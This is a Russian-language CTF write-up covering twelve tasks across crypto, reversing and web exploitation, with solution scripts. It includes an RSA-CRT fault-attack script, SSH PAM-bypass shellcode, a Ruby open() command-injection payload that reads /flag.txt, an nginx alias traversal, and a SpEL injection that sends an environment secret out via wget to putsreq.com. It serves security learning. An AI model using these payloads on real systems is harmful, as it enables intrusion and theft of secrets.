# Оглавление
- [Smart Card](#smart-card)
- [Thick Forest](#thick-forest)
- [Tricky Auth](#tricky-auth)
- [Booter](#booter)
- [Image Filters](#image-filters)
- [Acid Cloud](#acid-cloud)
- [QUADRA](#quadra)
- [Bad Engine X](#bad-engine-x)
- [WebShell](#webshell)
- [Cloudy Nights](#cloudy-nights)
- [Encrypted Traffic](#encrypted-traffic)
- [Tick-Tock](#tick-tock)

# Smart Card
Необходимо сгенерировать две криптограммы 𝑆₁ и 𝑆̂̂₁ для одинаковых данных: правильную криптограмму и полученную в результате ошибки при вычислении 𝑆\_𝑝 = 𝑚 ^ 𝑑\_𝑝 mod 𝑝.
Полученные криптограммы переводим в число (e.g. bytes_to_long), находим НОД их разности и открытого модуля 𝑁. Это будет 𝑞, делитель 𝑁.

>  𝑞 = GCD( 𝑆₁ - 𝑆͏̂̂₁, 𝑁)

Находим

>  𝑝 = 𝑁 / 𝑞,
>  𝜑(𝑁) = ( 𝑝 - 1 )( 𝑞 - 1 ),
>  𝑒 = 𝑑⁻¹mod 𝜑(𝑁).

Осталось расшифровать первую криптограмму в истории: 𝑚 = 𝑆^𝑒 mod 𝑁.

[Статья на инглише про RSA CRT fault-based attack](https://link.springer.com/content/pdf/10.1007/s001450010016.pdf)

```
#!/usr/bin/env python3

import aiohttp
import asyncio
import requests
from Crypto.Util.number import GCD, inverse, bytes_to_long, long_to_bytes
import logging

logging.basicConfig(level=logging.DEBUG)

class LoggingClientSession(aiohttp.ClientSession):
    def request(self, method, url, **kwargs):
        print('Starting request <%s %r>', method, url)
        return super().request(method, url, **kwargs)

async def post(session, url, data = ''):
    async with session.post(url, data=data) as response:
        print('s', list(session.cookie_jar))
        print('r', response.cookies.get('session'))
        return await response.json()

async def get(session, url, data = ''):
    async with session.get(url, data=data) as response:
        print('s', list(session.cookie_jar))
        print('r', response.cookies.get('session'))
        return await response.json()

async def broken_encrypt(session, url):
   rr = [
       post(session, url + '/gen_crypto','smth'),
       post(session, url + '/laser'),
   ]
   responses = await asyncio.gather(*rr)
   return responses

# set hostname
url = 'https://smartcard.vulns.vladimirlebe.dev/api/v1'

async def main(session):
    history = (await get(session, url + '/history'))['history']
    cflag = int(history[0], 16)
    print('cflag:', cflag)

    await asyncio.sleep(3)

    pk = await get(session, url + '/public_key')
    print('pk:', pk)
    N, e = int(pk['N']), int(pk['e'])

    c1_hex = (await post(session, url + '/gen_crypto', 'smth'))['result']
    c1 = int(c1_hex, 16)

    print('c1:', c1)

    p = 1

    while p == 1 or p == N:
        responses = await broken_encrypt(session, url)

        print('responses:', responses)

        c2_hex = responses[0]['result']
        c2 = int(c2_hex, 16)

        print('c2:', c2)

        p = GCD(c1 - c2, N)

    assert N % p == 0

    q = N // p
    phi_N = (p - 1) * (q - 1)

    d = inverse(e, phi_N)

    pt_flag = long_to_bytes(pow(cflag, d, N))
    print(pt_flag)

async def super_main():
    async with LoggingClientSession() as session:
        await main(session)

asyncio.run(super_main())
```

# Thick Forest
Таск работал так:
1. Используется простой ГПСЧ на основе линейного конгруэнтного метода.
2. На каждый символ пароля генерируется бинарное дерево, листья которого заполняются случайными значениями из ГПСЧ.
3. С помощью введённого символа выбирается соответствующий лист дерева.
4. Глобальное состояние складывается по модулю 2 со случайным значением из листа.
5. После ввода всех символов проверяется, что глобальное состояние соответствует заранее определённому значению.

Для решения таска нужно было один раз подсчитать значения листов для дерева каждого символа, а затем перебрать все сочетания листов, найдя при этом правильный пароль.

# Tricky Auth
При анализе исходного кода делаем следующие выводы:
1. В ответ на "Enter password:" нужно ввести шеллкод в hex.
2. Устанавливается политика seccomp: разрешены только системные вызовы read и write.
3. Исполняется шеллкод.
4. Возвращается ошибка аутентификации.

Пробуем самые простые команды:
-- c3 (ret) ни к чему не приводит
-- ebfe (jmp, который прыгает сам на себя) приводит к зависанию

Далее можно бы было попробовать снять со стека фрейм функции authenticate и вернуть SUCCESS, но так как у нас seccomp, процесс всегда будет крашиться.

Окей, разберёмся как работает pam-аутентификация в ssh. В хинте приведена ссылка на исходный код функции sshpam_thread, которая запускается в отдельном потоке каждый раз, когда вы подключаетесь к серверу. Цель этого потока -- запустить pam со всеми указанными модулями и получить результат аутентификации, после чего отправить основному процессу ssh. 

По исходному коду функции sshpam_thread видно, что она заполняет некую переменную buffer, после чего отправляет её по сокету основному процессу ssh с помощью функции ssh_msg_send.

Теперь мы можем запустить у себя локально ssh-сервер, настроить на нём pam и подключиться к нему. Далее находим ожидающий нашего пароля процесс с названием "... [pam]", цепляем к нему strace, вводим правильный пароль и смотрим вызовы write. Проверяем на примере, что мы правильно поняли как работает sshpam_thread, после чего пишем эксплойт. Также мы получаем номер файлового дескриптора (восьмой), который при эксплуатации сервиса скорее всего останется таким же.

```
#!/usr/bin/env python3
from pwn import *
import os

def get_shell(fd):
    success_type = b"\x00"
    message = b"\x00\x00\x00\x02OK"
    account_status = b"\x00\x00\x00\x01"
    pw_change_required = b"\x00\x00\x00\x00"
    env_count = b"\x00\x00\x00\x00"
    pam_env_count = b"\x00\x00\x00\x00"

    buf = success_type + message + account_status + pw_change_required + env_count + pam_env_count
    buf = p32(len(buf), endian='big') + buf

    return shellcraft.amd64.linux.echo(buf, fd)

def try_shell(sc, host, port):
    h = asm(sc, arch="amd64").hex()
    try:
        sd = ssh(user="user", host=host, port=port, password=h)
        sd.interactive()
    except Exception as e:
        print(e)

sc = get_shell(8)
try_shell(sc, "trickyauth.vulns.vladimirlebe.dev", 2222)
```

Пример шеллкода: 6a01fe0c246a01fe0c2448b801010101010102015048b8034e4a0101010301483104246801010116813424010101016a01586a085f6a1b5a4889e60f05

# Booter
1. Открываем бинарь вместе с pdb в декомпиляторе
2. Обнаруживаем что пароль -- это 20 букв и цифр (функция get_password)
3. В функции check_password пароль разбивается на части по 4 символа, делается операция zip этих частей с каким-то статичным массивом, затем для каждой части пароля проверяется, что её crc32 соответствует числу из статичного массива.
4. Для решения можно написать простенький скрипт, который переберёт все возможные комбинации из 4 букв и цифр и сравнит с константами в массиве, после чего останется лишь собрать части пароля в правильном порядке.

```
#!/usr/bin/env python3
import itertools
import string
from binascii import crc32

for x in itertools.product(string.ascii_lowercase + string.digits, repeat=4):
    x = ''.join(x)
    if crc32(x.encode()) in [3649579498, 2569728437, 2104797091, 3910198189, 3964639476]:
        print(x)
```

сама функция проверки пароля:

```
fn check_password(pass: &Password) -> bool {
    pass.0
        .chunks(4)
        .zip(flag::FLAG_CHUNKS)
        .all(|(a, b)| {
            let crc32 = crc::Crc::<u32>::new(&crc::CRC_32_ISO_HDLC);
            crc32.checksum(a) == b
        })
}
```


# Image Filters
В Ruby open -- очень опасная штука, которая позволяет исполнять команды, например если открыть урл `|ls`, то результатом будет вывод команды ls. Проблема лишь в том, что мы не получаем обратно результат выполнения команды. Однако, мы можем запихнуть вывод команды в картинку и вывести её. Так как используется ImageMagick, количество поддерживаемых форматов огромно. Среди них есть и текстовые, например, PostScript, в котором можно отрендерить вывод нужной команды:
`|echo -e "%!PS-Adobe-2.0\n/Times-Roman\nfindfont\n20 scalefont\nsetfont\nnewpath\n100 200 moveto\n($(cat /flag.txt)) show"`

# Acid Cloud
Нужно получить доступ к памяти текущего процесса, но из-за отсутствия привилегий /proc/self/mem оказывается недоступен. Мы бы могли подгрузить нативную библиотеку, но мы можем загрузить на сервис один единственный class-файл, так что этот вариант тоже не подходит (upd: участники всё-таки нашли способ это сделать :) ). Зато в Java есть встроенная возможность читать произвольные участки памяти процесса (в данном контексте это называется off-heap memory) через специальный недокументированный класс sun.misc.Unsafe.

Получить его можно, например, так:

```
private Unsafe getUnsafe() throws IllegalAccessException, NoSuchFieldException {
        Field f = Unsafe.class.getDeclaredField("theUnsafe");
        f.setAccessible(true);
        return (Unsafe) f.get(null);
    }
```

Далее через `getUnsafe().getByte(0xdeadbeef)` мы можем читать произвольную память процесса. Но как нам найти нужный участок? Для этого мы можем распарсить файл `/proc/self/maps` и найти нужный сегмент (`[heap]`), который сдампить полностью или прямо в классе реализовать поиск строки CYBERMIR{.

# QUADRA
Проблема в том, что в "==" сравнении "0e" означает, что если следующие символы являются цифрами, то вся строка обрабатывается как float.
Получается, что эти магические числа хэшей рассматриваются как число «0» и сравниваются с другими хэшами, сравнение будет оцениваться как истинное. Нужно либо набрутить такую строку вида "0е.....", которая при хешировании будет давать результат "0е", либо воспользоваться радужной таблицей.
Примеры подходящих значений:
MD5(0e1137126905) = 0e291659922323405260514745084877	
MD5(0e215962017) = 0e291242476940776845150308577824

# Bad Engine X
Директива alias работает так: берётся путь из запроса без префикса, прописанного в location и добавляется к пути, указанном в alias. Например, если написать в урле /hello/world, то будет запрошен файл /app/world. Звучит логично, но проблема в том, что в задании прописан location /hello, без слеша в конце. Таким образом, если мы запрашиваем /helloindex.html, то получаем файл /app/index.html. Звучит уже не так логично, да? Раскрутим это до совсем черной магии: запрашиваем урл /hello../flag.txt, получаем /app/../flag.txt, то есть нужный нам /flag.txt. Почитать об этой уязвимости можно, например, тут: https://davidhamann.de/2022/08/14/nginx-alias-traversal/

# WebShell
Команды выполняются из-под пользователя restricted, переменные окружения с флагом лежат в /proc/1/environ, но прав для их получения нет. Однако, есть некий журнал аудита, в который записываются команды, отформатированные с помощью SpEL. Нюанс в том, что команда передаётся не как контекст для шаблона, а как сам шаблон, поэтому в неё можно добавить выражения SpEL:
`#{T(java.lang.Runtime).getRuntime().exec('wget https://putsreq.com/ZhnUiZaHJoa08sTgal13?' + T(java.lang.System).getenv('FLAG'))}`
В данном пэйлоаде мы отправляем от рутового юзера запрос на сервис putsreq.com (ну либо можно поднять свой сервер и получить запрос в нём) и добавляем к этому запросу флаг из переменных окружения.

# Cloudy Nights
QR-код проплывает под маской, через которую видно лишь очень маленькие кусочки кода. Тем не менее, информации в видео достаточно, чтобы восстановить код полностью. Для решения нужно написать скрипт, который будет отслеживать изменения пикселей в белых точках и красить в чёрный соответствующие точки нового изображения, учитывая при этом скорость перемещения QR-кода в видео.

```
import cv2
import numpy as np
import numba as nb

d = 21
t = 2
init_frame = 160

from math import gcd
d, t = d // gcd(d,t), t // gcd(d,t)

def main():
    vidcap = cv2.VideoCapture("clouds.mkv")
    success, clouds = vidcap.read()

    y, x, _ = clouds.shape
    diffs = np.zeros((y, x * 4, 3), dtype=np.uint8)

    success, image = vidcap.read()
    frame = 2
    while success:
        if frame < init_frame:
            success, image = vidcap.read()
            frame += 1
            continue

        if frame % t == 0:
            diff = np.where((clouds > [100, 100, 100]) & (image < [30, 30, 30]), clouds, 0)
            diffs[:, :x] |= diff
            diffs = np.roll(diffs, d, 1)

        success, image = vidcap.read()
        frame += 1

    cv2.imwrite("flag.jpg", diffs)


if __name__ == "__main__":
    main()
```

# Encrypted Traffic
Открываем дамп в Wireshark, видим TLS, экспортируем сертификат. Зная n = p*q и данное в описании таска значение p+q, можно решить систему уравнений и найти p и q. Далее нужно вычислить приватную экспоненту d и собрать из этого ключ в формате pem. Загрузив ключ в Wireshark, мы получим расшифрованный трафик, в котором лежит флаг.

```
#!/usr/bin/env python3
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
from cryptography import x509
from cryptography.hazmat.primitives.asymmetric.rsa import rsa_crt_iqmp, rsa_recover_prime_factors, rsa_crt_dmp1, rsa_crt_dmq1, RSAPublicKey, RSAPrivateNumbers
import math

def lcm(a, b):
    return abs(a*b) // math.gcd(a, b)

with open("extracted.crt", "rb") as crt_file:
    cert = x509.load_pem_x509_certificate(crt_file.read(), backend=default_backend())
    public_key = cert.public_key()
    assert isinstance(public_key, RSAPublicKey)
    public_numbers = public_key.public_numbers()
    n = public_numbers.n
    e = public_numbers.e
    sum = 51185798527813898217244959146174170995277531101327507615647727646782297370477092100612947052593075126252090256589830237695461025840328352294907386530193231382513463790619213034308781492265111628165309249234796437084817436954404110168743332197444382134896981821409728934361468644113472442965544068752549817351859503041640916596760683531014105154550685026237321821927529703563437223245450854402435570693121557472605563998377744946402019831406325544239643303846017705543806966503249955273500139931504149619319741728657922714315834715358161651401725705034822365071109358954590570384504645707607299923584913543739581356124
    D = sum**2 - 4*n
    s_D = math.isqrt(D)
    assert s_D ** 2 == D
    p = (sum + s_D) // 2
    q = sum - p
    assert p*q == n
    lmbd = lcm(p-1, q-1)
    d = rsa_crt_iqmp(lmbd, e)
    assert (e*d) % lmbd == 1
    iqmp = rsa_crt_iqmp(p, q)
    dmp1 = rsa_crt_dmp1(d, p)
    dmq1 = rsa_crt_dmq1(d, q)
    numbers = RSAPrivateNumbers(p, q, d, dmp1, dmq1, iqmp,
                                    public_numbers)
    key = default_backend().load_rsa_private_numbers(numbers)
    pem = key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption()
    )
    print(pem.decode(), end='')
```

# Tick-Tock
Это програма, в которой есть 3 очень простых алгоритма, которые вычисляют ключ для расшифрования флага. Нужно декомпилировать бинарь, понять что происходит, переписать алгоритмы на быстрые варианты. 

## Авторский скрипт
```
from sympy.ntheory import factorint
import hashlib
from Crypto.Cipher import AES
parts = [0] * 8
parts[0] = pow(0x123, 0x0cafebabe0, 0x4defaced)
parts[1] = pow(0x456, 0x1cafebabe1, 0x4defaced)
parts[2] = pow(0x789, 0x2cafebabe2, 0x4defaced)
parts[3] = pow(0xabc, 0x3cafebabe3, 0x4defaced)
parts[4] = pow(0xdef, 0x4cafebabe4, 0x4defaced)
parts[5] = pow(0xfed, 0x5cafebabe5, 0x4defaced)
parts[6] = pow(0xcba, 0x6cafebabe6, 0x4defaced)
parts[7] = pow(0x987, 0x7cafebabe7, 0x4defaced)
parts.sort()
def  facstring(num):
 fstr = ""
 factors = factorint(num)
 for key, value in factors.items():
 fstr += f"{key}"*value
 return fstr
fstr = ""
for part in parts:
 fstr += facstring(part)
m = hashlib.sha256()
m.update(bytes(fstr, "ASCII"))
key = m.digest()
iv = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
encrypted_flag = b"\x91\x88\x35\xe8\x92\x59\xe6\x8e\xf9\xb3\xab\x9c\x6a\x16\x0b\x44\x84\xbe\x00\x4e\xfc\x83\x2a\x92\xc4\x44\x7c\x55\xc2\x69\xda\x4f"
cipher = AES.new(key, AES.MODE_CBC, iv)
print(cipher.decrypt(encrypted_flag).decode("ascii"))
```

## бонус, решение от @KillingInTheNameOf
отреверсил функцию генерации ключа, переписал половину функции на питон:

```

from sympy.ntheory import factorint

v4 = [0] * 8
v4[0] = pow(0x123, 0xCAFEBABE0, 0xDEFACED9999)
v4[1] = pow(0x456, 0x1CAFEBABE1, 0xDEFACED9999)
v4[2] = pow(0x789, 0x2CAFEBABE2, 0xDEFACED9999)
v4[3] = pow(0xABC, 0x3CAFEBABE3, 0xDEFACED9999)
v4[4] = pow(0xDEF, 0x4CAFEBABE4, 0xDEFACED9999)
v4[5] = pow(0xFED, 0x5CAFEBABE5, 0xDEFACED9999)
v4[6] = pow(0xCBA, 0x6CAFEBABE6, 0xDEFACED9999)
v4[7] = pow(0x987, 0x7CAFEBABE7, 0xDEFACED9999)
v4.sort()

print(''.join(''.join([str(x) for x in sorted(sum([[k]*v for k, v in factorint(v4_elem).items()], []))]) for v4_elem in v4))
```

дальше засунул всё это в хук для фриды:

```
let fill_buffer = new NativeFunction(Module.getBaseAddress("tick-tock").add(0x2ed4), 'void', ['pointer']);
let sub_2f66 = new NativeFunction(Module.getBaseAddress("tick-tock").add(0x2f66), 'void', ['pointer', 'pointer', 'uint64']);
let sub_3036 = new NativeFunction(Module.getBaseAddress("tick-tock").add(0x3036), 'void', ['pointer', 'pointer']);

Interceptor.replace(Module.getBaseAddress("tick-tock").add(0x142d), new NativeCallback((outputBuffer) => {
    let factor_string = "289294227363123281981259991784476559862322313740675397122225101378197957661363004857933237379902525122213808915588431";
    let factor_ptr = Memory.allocUtf8String(factor_string);
    let buffer_ptr = Memory.alloc(4 * 30);
    fill_buffer(buffer_ptr);
    sub_2f66(buffer_ptr, factor_ptr, factor_string.length);
    sub_3036(outputBuffer, buffer_ptr);
}, 'void', ['pointer']));

```

и запустил бинарь с хуком: `frida -l ./hook.js --no-pause -f ./tick-tock`
